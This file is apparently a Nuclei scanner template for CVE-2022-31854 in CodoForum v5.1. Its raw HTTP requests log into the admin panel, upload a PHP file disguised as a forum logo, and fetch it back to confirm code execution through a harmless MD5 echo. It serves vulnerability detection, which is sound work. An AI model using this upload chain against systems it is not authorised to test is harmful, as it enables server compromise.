88 lines
2.5 KiB
YAML
88 lines
2.5 KiB
YAML
id: CVE-2022-31854
|
|
|
|
info:
|
|
name: CodoForum v5.1 - Remote Code Execution
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.
|
|
reference:
|
|
- https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31854
|
|
- https://codoforum.com
|
|
- https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-31854
|
|
cwe-id: CWE-434
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2022,rce,codoforumrce,authenticated
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /admin/?page=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB
|
|
|
|
------WebKitFormBoundaryACGPpj7UIqmtLNbB
|
|
Content-Disposition: form-data; name="username"
|
|
|
|
{{username}}
|
|
------WebKitFormBoundaryACGPpj7UIqmtLNbB
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
{{password}}
|
|
------WebKitFormBoundaryACGPpj7UIqmtLNbB--
|
|
|
|
- |
|
|
GET /admin/index.php?page=config HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /admin/index.php?page=config HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
|
|
|
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
|
Content-Disposition: form-data; name="site_title"
|
|
|
|
|
|
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
|
Content-Disposition: form-data; name="forum_logo"; filename="{{randstr}}.php"
|
|
Content-Type: application/x-httpd-php
|
|
|
|
<?php
|
|
|
|
echo md5('CVE-2022-31854');
|
|
|
|
?>
|
|
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
|
Content-Disposition: form-data; name="CSRF_token"
|
|
|
|
{{csrf}}
|
|
------WebKitFormBoundaryoLtdjuqj2ixPvBhA--
|
|
|
|
- |
|
|
GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_4 == 200'
|
|
- 'contains(content_type_4, "text/html")'
|
|
- 'contains(body_4, "a63fd49130de6406a66600cd8caa162f")'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="CSRF_token" value="([0-9a-zA-Z]+)"/>'
|
|
internal: true
|